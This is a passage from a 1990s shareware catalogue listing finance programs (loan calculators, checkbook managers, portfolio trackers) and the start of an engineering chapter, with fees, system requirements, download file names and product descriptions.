prints checks, works + with CheckFree, interfaces to TurboTax, imports stock quotes + from Prodigy, and imports Quicken .QIF files. Has on-line user + guide and extensive context sensitive help. Fully supported. + + + Product: Portfolio Manager + Powerful record system for your investments. See full + description on page 337. + + Product: Total Investor for 1-2-3 DOS + Portfolio manager/technical analysis template. See full + description on page 323. + + Product: Total Investor for Symphony + Portfolio manager/technical analysis template. See full + description on page 324. + + Product: Variable Investment Analyst + Comprehensive investment portfolio management. See full + description on page 338. + + Chapter 8, "Finances" 330 + + + + Product: WinCharging + Windows The Credit Card Manager. See full description on + page 252. + + 8.2.1 Finances & budgets + + Product: Amortz - Loan Schedules & More! + Easy loan calculation system. See full description on + page 339. + + Product: ANNUITY ACE + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 1.03 (12-20-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy; discounts on upgrades. + Look for: ACE103.ZIP on BBSs; ANNACE.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Now project your savings as never before! Professional + illustrations for deferred, immediate and split annuities + (savings, IRA, 401K, etc). Flexible with variable deposits, + withdrawals, interest rates and compound methods. Tax + analysis, COLA, loads, inflation factoring and more! Detail is + monthly - annual, calendar or fiscal, whole dollars or cents. A + professional version is available - allows lient & agent name, + headers, footnotes, multiple client save and retrieve. + + Chapter 8, "Finances" 331 + + + + Product: Debt Analyzer for Windows + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 2.0 (12-20-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; Hard + disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, fax, CompuServe, mail support; 3-month limited + return policy; disks of other shareware. + Look for: DEBTW200.ZIP on BBSs; DEBTWN.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + Hopelessly in debt? Need a systematic way to rid yourself of + it? This is the answer! Now the techniques used by bankers and + credit counselors can be used in the comfort of your own home. + You can produce debt elimination and loan consolidation + schedules which can illustrate hundreds of dollars in potential + savings. Supports up to 50 debts. Several options are + available to help accelerate and optimize the debt elimination + schedule. + + + Product: Financial Freedom + Author: M & R Technologies, Inc., 407-951-2268 + Version: 2.0 (02-01-94) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 6); discounts on other + products. + Look for: FFREED.ZIP on BBSs; FFREED.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11 (or contact userID 72103,505 for + assistance). + Download size: 644k (about 48 minutes with a 2400 baud modem) + Description: + Features include management of checking and savings, budget + control, loan analysis and amortization, check printing, + automated account reconciliations and strong reporting options. + Very easy to use and is designed for individuals who are new to + Windows or finance management. + + Chapter 8, "Finances" 332 + + + + Product: Financial Freedom GOLD + Author: M & R Technologies, Inc., 407-951-2268 + Version: 1.0 (03-30-94) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $24.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6); discounts on other products. + Look for: FFGOLD.ZIP on BBSs; FFGOLD.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11 (or contact userID 72103,505 for + assistance). + Download size: 649k (about 48 minutes with a 2400 baud modem) + Description: + Features include unlimited bank accounts (checking, savings, + credit cards, etc.), automated account reconciliations, + budgeting, check printing, strong reporting options, bill- + reminder utility, password protection, loan analysis and + amortization, online help and much more! + + + Product: FPLAN-KWIK Financial&Retire Pln + Author: First Financial Software (Ron Kline, CFP, MBA), + 800-736-4920 + Version: 1.0 (06-14-94) + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Strongly recommended: CGA monitor; HP LaserJet printer; Mouse. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, mail support; all ASP- + wide offers (see page 6); discounts on other products; + discounts on upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; KFPLAN.ZIP on CompuServe + in CIS:INVFORUM forum LIBrary 7 (or contact userID 70272,3655 + for assistance). + Download size: 625k (about 47 minutes with a 2400 baud modem) + Description: + Gives a quick analysis of any or all included financial + planning subjects: retirement, education funding, life + insurance, disability, estate preservation, etc. Has option for + US or international subjects/terms. Automatic install program. + Automatic save feature. Tutorial w/printable check-list. + Subject data guides for all items. Financial planning check-up + for suggestions & tips. Automatic insert of other subjects + relevant data in current input module. Quick & easy know & plan + your situation. + + Chapter 8, "Finances" 333 + + + + Product: LOAN CHIEF + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 1.12 (12-20-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy. + Look for: CHF112.ZIP on BBSs; CHIEF.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Loan calculating has never been this easy! Professional + schedules with a multitude of options: Weekly - annual, + variable rates, loan acceleration, tax analysis, variable + payments, cumulative/non cumulative, variable compounding + methods and much more! Produces loan charts, a new and novel + concept in loan processing. Save and retrieve info. Solve for + missing values. A professional version is available - allows + client & agent name, headers, footnotes, multiple client save + and retrieve. + + + Product: Money Organizer + Author: Redei Enterprises, 310-832-6984 + Version: 2.0 (04-11-95) + Needs: IBM 80386, Windows 3.1 or better. SVGA monitor; Hard + disk; Mouse; VBRUN300.DLL. + Strongly recommended: Modem; XMS memory; math coprocessor. + Registration fee: $25.00 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 1800k (about 134 minutes with a 2400 baud modem) + Description: + Handles unlimited number of checking, savings, credit card, + loan, and personal accounts. Allows complete transactions + between accounts. Provides budgeting and maintains all + transactions by budget categories. Creates reports, compares + the actual transactions with your budgets and graphs the + results. Prints reports in any language including those + writing right-to-left like Hebrew. Stores personal data, phone + numbers, dials or pages. Tells you when something is due to + pay. + + Chapter 8, "Finances" 334 + + + + Product: PC-GL + General ledger. See full description on page 258. + + Product: PCLoan5 + Professional loan amortization system. See full description on + page 251. + + 8.2.2 Checkbook managers + + Product: EXPRESSCHECK + Author: Expressware Corporation, 206-788-0932 + Version: 4.04 (11-18-93) + Needs: IBM PC, DOS 2.0 or better. 320k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $34.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + upgrades. 1-month free upgrading allowed. + Look for: CHECK4.ZIP on BBSs (call 206-788-4008 to download it at + no charge); CHECK4.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 4 (or contact userID 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Easy-to-use checkbook manager. Screens resemble actual checks, + deposit slips and automated teller machine panels. Split + transactions up to 5 ways with over 200 budget codes per + account. Up to 90 accounts. Reports can be printed to show + totals, monthly totals, average monthly budget code totals and + more. Combined accounts for more detailed reports. Print + checks on any check format. Bill reminder system, + reconciliation, activity log. + + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 333. + + Chapter 8, "Finances" 335 + + + + 8.3 Portfolio management + + Product: Capital Gainz + Author: AlleyCat Software, Inc. (Dave Cohen), 919-542-6117 + Version: 4.1 (02-16-96) + Needs: IBM 80386, DOS 5.0 or better. 2048k RAM; Hard disk; XMS + memory. + Strongly recommended: VGA monitor; Mouse; Epson printer. + Registration fee: $69.00 (add $5.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; 2-month return policy; bonus utilities; discounts + on upgrades. + Look for: CGZ4*.ZIP on BBSs (call 919-542-6611 to download it at + no charge); CGZ4*.ZIP on CompuServe in CIS:INVFOR forum LIBrary + 1 (multiple files) (or contact userID 70431,132 for + assistance). + SWREG#: 4078 + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + A portfolio manager for small investors and investment + managers. Ideal for a 'dollar-cost averaging' strategy. - + Record purchases, sales, dividends, capital gains, splits - + Calculate gain/loss, total return, IRR - View or print security + information over range of dates - Reinvest dividends, + redistribute sale proceeds - Execute sales using FIFO, LIFO, + max gain/loss, ID, avg cost - Variety of reports including tax + forms - Single price entry updates all related securities - + Bond discount/amortization + + Chapter 8, "Finances" 336 + + + + Product: Capital Gainz for Windows + Author: AlleyCat Software, Inc. (Dave Cohen), 919-542-6117 + Version: 5.1 (01-01-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk. + Strongly recommended: SVGA monitor; HP DeskJet printer; HP + LaserJet printer; Hayes-compatible modem; Mouse. + Registration fee: $69.00 (add $5.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; 2-month return policy; all + ASP-wide offers (see page 6); discounts on upgrades. + Look for: CGZ5*.ZIP on BBSs (call 919-542-6611 to download it at + no charge); CGZ5*.ZIP on CompuServe in CIS:INVFOR forum LIBrary + 1 (or contact userID 70431,132 for assistance). + Download size: 2800k (about 208 minutes with a 2400 baud modem) + Description: + A portfolio for small investors and investment managers. Ideal + for a 'dollar-cost averaging' strategy. - Record purchases, + sales, dividends, capital gains, splits - Calculate gain/loss, + total return, IRR - View or print security information over a + range of dates - Reinvest dividends, redeistribute sale + proceeds - Execute sales using FIFO, LIFO, max gain/loss, ID, + avg cost - Variety of reports including tax forms - Single + price entry updates all related securities - Bond discount/ + amortization + + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 342. + + Product: THE FEELING'S MUTUAL-WINDOWS + Mutual fund database/financial planner. See full description + on page 326. + + Product: Loan Master + Complete loan accounting and tracking system. See full + description on page 256. + + Product: PCLoan5 + Professional loan amortization system. See full description on + page 251. + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 329. + + Chapter 8, "Finances" 337 + + + + Product: Portfolio Manager + Author: Shane Software International (Steven C. Hane), + 360-681-2402 + Version: 5.3 (07-15-95) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Strongly recommended: VGA monitor; Epson printer. + Registration fee: $49.00 (add $3.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, BBS, + CompuServe, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: P_MGR53.ZIP on BBSs (call 360-452-7681 to download it + at no charge); PMGR53.ZIP on CompuServe in CIS:INVEST forum + LIBrary 10 (or contact userID 73060,2370 for assistance). + Download size: 880k (about 66 minutes with a 2400 baud modem) + Description: + Tracks most market investments. It also can handle CD's, + savings, limited partnerships, etc. Can maintain up to 5 accts + in 1 portfolio to separate your records for an IRA, spousal + IRA, special purpose account, etc. Will measure portfolio + performance to meet long range goals. It computes ROI, + estimated and actual yields, and other analytical data. It's an + excellent tax preparation and planning tool. 23 reports. Share + selection on sales. Menu driven & mouse compatible. + + + Product: StockQuest + Stock price analyser, multi-dimensional. See full description + on page 323. + + Product: Total Investor for 1-2-3 Window + Portfolio management and charting for 1-2-3. See full + description on page 217. + + Chapter 8, "Finances" 338 + + + + Product: Variable Investment Analyst + Author: Will Baldwin, 417-626-9109 + Version: 5.92 (04-01-95) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse; math coprocessor. + Registration fee: $15.00 + Registration benefits: 31/2" master disk(s); 12 months of phone, + fax, CompuServe, mail support; bonus data; all ASP-wide offers + (see page 6); disks of other shareware. Lifetime free + upgrading allowed. + Look for: VARIN592.ZIP on BBSs; VARINV.ZIP on CompuServe in + CIS:INVFORUM forum LIBrary 5 (or contact userID 76200,275 for + assistance). + SWREG#: 2579 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Calculates profit, capital gain, periodic, cumulative, and + average annual total return, internal rate of return (IRR), + buy/sell prices, and other statistics. Produces 12 types of + charts. Can import/export data. It is especially useful for + investments involving multiple cash flows, such as mutual + funds, 401k plans, annuities, and partnerships, but also is + helpful for stocks, bonds, bank accounts, CD's, etc. Has pull + down menus, dialog boxes, and mouse support. + + + Product: Wall Street Simulator - Windows + Learn how to trade and compete with others. See full + description on page 324. + + + 8.4 Financial calculators + + See also: Utilities, Desktop utilities, Calculators; + Spreadsheet applications; Business, Business utilities, Weights + & measurements. + + Chapter 8, "Finances" 339 + + + + Product: Amortz - Loan Schedules & More! + Author: Mountain View Software (Jim Bowyer), 206-845-2744 + Version: 1.60 (10-31-94) + Needs: IBM PC, DOS 2.11 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $10.00 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, GEnie, mail support; + 1-month return policy; all ASP-wide offers (see page 6). + 12-month free upgrading allowed. + Look for: AMORTZ16.ZIP on BBSs (call 415-323-4398 to download it + at no charge); AMORTZ.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 5 (or contact userID 74040,533 for assistance); + AMORTZ16.ZIP on GEnie in IBMPC forum LIBrary 30. + SWREG#: 3711 + PsL#: 11660 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A very "user friendly" financial loan system designed to be + useful an understandable to everyone - from a CPA putting + together a multi-million dollar deal to a teenager trying to + swing that first car loan. It can calculate any of the loan + variables (principal, interest rate, payment amount, or number + of payments), immediately show loan totals, and then generate a + "payback" schedule which you can review on screen or send to + the printer for a "hardcopy" record of payments. + + + Product: Debt Analyzer for Windows + Debt reduction and elimination. See full description on + page 330. + + Product: FeeRate for Windows + Calculate fees based on desired yearly salary. See full + description on page 117. + + Product: FeeRate for Windows 95 / NT + Hourly fee rate calculator for professionals. See full + description on page 249. + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 327. + + Chapter 8, "Finances" 340 + + + + Product: MathWiz + Author: Informatik Inc., 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; MATHWZ.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 6 (or contact userID 76534,1166 + for assistance). + SWREG#: 6322 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Versatile, easy-to-use financial analyser and calculator. PV, + FV, IRR, periods, payback functions, spreadsheet-type input of + irregular cash flow, save and print functions, view and print + multi-term amortization tables, calendar date calculations, + paper tape, roll-back, cut & paste, trigonometry. Excellent + all-purpose analyser and calculator. + + + Product: Money Math for Windows + Financial analysis mathematical tools. See full description on + page 250. + + Product: OpenHome + Selling property qualification generator. See full description + on page 300. + + Product: PCLoan5 + Professional loan amortization system. See full description on + page 251. + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 329. + + Product: WinPrice + Picks best deal from any two choices. See full description on + page 343. + + + 8.5 Income tax preparation + + Product: Portfolio Manager + Powerful record system for your investments. See full + description on page 336. + + Chapter 8, "Finances" 341 + + + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 277. + + + 8.6 Finance utilities + + Product: Amortz - Loan Schedules & More! + Easy loan calculation system. See full description on + page 338. + + Product: ANNUITY ACE + Savings: deferred, immediate, split annuities. See full + description on page 330. + + Product: DDE Requester for Win3.x & NT + Author: Westerdale AG (Simon Westerdale), 41-62-260935 + Version: 1.01.00 (03-31-94) + Needs: IBM 80386, Windows 3.0 or better. VGA monitor; Hard disk; + Mouse; VBRUN300.DLL. + Strongly recommended: SVGA monitor; EMS memory; math + coprocessor. + Registration fee: Sfr75.00 (add Sfr12.00 for shipping to U.S. + addresses) (add Sfr12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 6 months of unlimited phone, fax, + CompuServe, mail support; site license; all ASP-wide offers + (see page 6); discounts on other products; discounts on + upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; DDEREQ.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 11 (or contact userID 100144,2552 + for assistance). + Download size: 1105k (about 82 minutes with a 2400 baud modem) + Description: + This program will record changes in DDE data through DDE links + e.g. price history can be recorded from Reuters 1000, or profit + & loss can be recorded from Excel and saved in Access v1.1 MDB + or delimeted textfile format. Many DDE links allowed. Unlimited + DDE sources. Can record multiple data items per DDE record + (bid, ask, etc). Records data in Access v1.1 MDB or delimeted + textfile format. Windows NT tested. Fully configurable and has + a totally automatic mode. Can even detect bad DDE data or + prices. + + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 327. + + Product: LOAN CHIEF + Loan schedules, charts and solve for calc. See full + description on page 332. + + Chapter 8, "Finances" 342 + + + + Product: THE MORTGAGE ANALYZER + Mortgage schedules, comparisons, acceleration. See full + description on page 299. + + Product: WinPrice + Author: Open Windows (Richard W. Bryant), 719-531-0403 + Version: 1.0 (02-10-94) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of CompuServe, mail support; lifetime return policy; + bonus utilities; disks of other shareware. 12-month free + upgrading allowed. + Look for: PRICE_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); PRICE.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 56k (about four minutes with a 2400 baud modem) + Description: + Selects the best pricing between two alternatives. No more + struggling with the "Is 1 liter of GummySlurp for $1.29 a + better buy than 1 gallon for $4.87 ?" issue!! Automatically + accounts for differences in the units used in the two cases and + will give its results in either metric or English units as + desired. Easy to use - educational for children. + + Chapter 9, "Engineering" 343 + + + + + + Chapter 9 + Engineering + + See also: Data, Engineering data; Graphics, CAD/CAM + applications. + + + 9.1 Civil engineering + + Product: Beam Cookbook + 2D beam solver - linear elastic systems. See full description + on page 346. + + Product: GammaCAD PRO + Full featured, easy to use CAD program. See full description + on page 495. + + + 9.2 Electrical engineering + + Product: GammaCAD PRO + Full featured, easy to use CAD program. See full description + on page 495. + + Product: INSTINDX + Author: C T Johnson, Inc, 704-568-9598 + Version: 1.0 (09-01-94) + Needs: IBM AT (80286), DOS 3.2 or better. 1000k RAM; CGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Strongly recommended: EMS memory; math coprocessor. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + phone, fax, BBS, CompuServe, mail support; 2-month return + policy; site license; bonus data; all ASP-wide offers (see + page 6); disks of other shareware. 12-month free upgrading + allowed. + Look for: CTJIII.* on BBSs (multiple files) (call 704-532-1236 to + download it at no charge); CTJIII.* on CompuServe in CIS:LEAP + forum LIBrary 4 (multiple files) (or contact userID 72760,1020 + for assistance). + SWREG#: 3479 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Relational instrument index that prints (4) index reports: I/O, + address, specs, and full index. Prints instrument, control & + safety valve, and gauge/thermometer data sheets + (specifications). Includes ESTIMATing, CONTROLS, PROCPARM, and + MEASVAR dbs. Linked by pop-up windows to ISA standards for + + Chapter 9, "Engineering" 344 + + + + developing Tags. Limited only by HD size. Menu driven, help at + all screens. Can be customized for complete project management. + + + Product: PC-ECAP + Author: Circuit Systems, 609-875-5433 + Version: 3.01 (01-24-94) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hercules monitor; HP DeskJet + printer; HP LaserJet printer; Epson printer. + Registration fee: $99.00 (add $4.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 6). + 2-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: ECAP301.ZIP on BBSs (call 609-764-0812 to download it + at no charge); ECAP30.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 13 (or contact userID 72202,3043 for assistance). + PsL#: 10411 + Download size: 174k (about 13 minutes with a 2400 baud modem) + Description: + This easy-to-use linear circuit analysis program will calculate + gain, phase, group delay, impedance, VSWR, and return loss for + your circuits. Also calculates transient response for one of 8 + input waveforms. Completely menu driven. Can analyze circuits + with up to 90 nodes and 1000 components. Built in full screen + text editor with "Help". Full screen file selector. Plots high + res graphs on screen or on IBM/Epson-9/24 pin, HP LaserJet or + HP DeskJet printers. Even makes bipolar transistor models. + + + Product: RADIOSIM + Author: BREMENSON (Claude BREMENSON) + Version: 3.0 (04-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; + Hercules monitor. + Strongly recommended: EGA monitor; Hard disk; math coprocessor. + Registration fee: $1,800.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited fax, CompuServe, mail + support; 6-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + + Chapter 9, "Engineering" 345 + + + + 12-month free upgrading allowed. 12 free update disk(s) sent + out. + Look for: RADSIM30.ZIP on BBSs; RADSIM.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 13 (or contact userID 100337,622 for + assistance). + Download size: 370k (about 28 minutes with a 2400 baud modem) + Description: + Simulates a digital/analog radioelectric link in presence of + distorsions and interferences. Technical domains: satellite + transmission, radiolinks, mobile radio, etc. 44 modules + (digital modem, filter, equalizer, TWT, etc.), with variable + parameters. On line contextual Help (120 screens). Typical + resolved problem: BER versus C/N as a function of power amp. + backoff and type/level of interferers Digital modulations: PSK, + OQPSK, QAM, FSK, MSK, etc. + + + 9.3 Industrial engineering + + Product: DXF Bill of Materials Generator + Bills of materials from AutoCAD DXF files. See full + description on page 354. + + + 9.4 Mechanical engineering + + Product: Beam Cookbook + Author: SoftEngineering, 714-497-3952 + Version: 1.00 (10-01-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Epson printer. + Strongly recommended: EGA monitor; Mouse; EMS memory; math + coprocessor. + Registration fee: $59.95 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, CompuServe, mail support; 3-month return policy; all + ASP-wide offers (see page 6); discounts on upgrades. Prodigy + support. + Look for: BCKBK10.ZIP on BBSs; BCKBK.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 13 (or contact userID 72760,76 for + assistance). + SWREG#: 4363 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Solves 2D beams with multiple supports, variable I, hinges, + moment connectors, concentrated loads, moments, uniform loads, + and ramp loads. Springs can be added to the supports, hinges, + and moment connectors. Forced deflection and slopes can be + defined at the supports. You can display or print input data, + reactions, boundary conditions, and beam values. You can also + + Chapter 9, "Engineering" 346 + + + + graphically display or print the beam and shear/moment/slope/ + diagrams. (520K min RAM) + + + Product: GammaCAD PRO + Full featured, easy to use CAD program. See full description + on page 495. + + Product: J-Works + HVAC load calculation and sizing program. See full description + on page 291. + + Product: Steam Properties + Version: 1.0 (06-28-95) + Needs: IBM AT (80286), Windows 3.0 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; Mouse. + Registration fee: $60.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited CompuServe, mail support; all + ASP-wide offers (see page 6); discounts on upgrades. 1 free + update disk(s) sent out. + Look for: STEAM10*.ZIP on BBSs (multiple files); STEAM.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 13 (or contact userID + 100131,2557 for assistance). + SWREG#: 6376 + PsL#: 14093 + Download size: 530k (about 40 minutes with a 2400 baud modem) + Description: + A Windows application that calculates the properties of steam/ + water within a wide range of pressure and temprature. It may be + used for analyzing a number of energy conversion components + used in power plants, such as steam turbines, pumps, boilers + and heat exchangers. The accompanied help file "Thermodynamics + online help" gives a brief description of these components. + + Chapter 9, "Engineering" 347 + + + + Product: Water and Steam Properties + Author: Katmar Software (Harvey Wilson) + Version: 1.2 (08-12-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Hard disk. + Registration fee: $40.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6). + Look for: WASP12.ZIP on BBSs; WASP.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 13 (or contact userID 100100,2050 for + assistance). + SWREG#: 3263 + PsL#: 11376 + Download size: 131k (about ten minutes with a 2400 baud modem) + Description: + Replaces and improves on printed steam tables by providing a + wider set of properties, eliminating need to interpolate, and + working in many different units. Will find the conditions for + known values of enthalpy, entropy or density. Has context + sensitive on-line help. + + It gives 15 point properties and 17 temperature and pressure + dependent properties for ice, water and steam. Most + correlations cover from -100 to 800 deg C and up to 1000 bar. + Calculated data points match published data very closely. + + + 9.5 Structural analysis + + Product: Beam Cookbook + 2D beam solver - linear elastic systems. See full description + on page 345. + + + 9.6 Surveying & cartography + + See also: Data, Mapping data; Graphics, Business applications, + Mapping/cartography. + + Product: GammaCAD PRO + Full featured, easy to use CAD program. See full description + on page 495. + + Product: Landscape Explorer + 3D landscape visualization tool. See full description on + page 502. + + Chapter 9, "Engineering" 348 + + + + Product: MapDraw + Author: Informatik Inc., 610.640.0339 + Version: 2.1 (12-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $89.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; MAPDRW.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 20 (or contact userID 76534,1166 + for assistance). + SWREG#: 6508 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Deep plotting system draws maps based on metes and bounds + descriptions. Easy to use. Online display of maps as the data + is entered. Calculates gaps and acreage. Curves, closing, + scaling, multiple lots, conversions of 'old' measurements. High + quality printing on any Windows-compatible printer. The system + is currently used in most states. An ideal map drawing system + for real estate and title professionals! + + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 502. + + Product: VERSAMAP + Draws outline maps on 14 map projections. See full description + 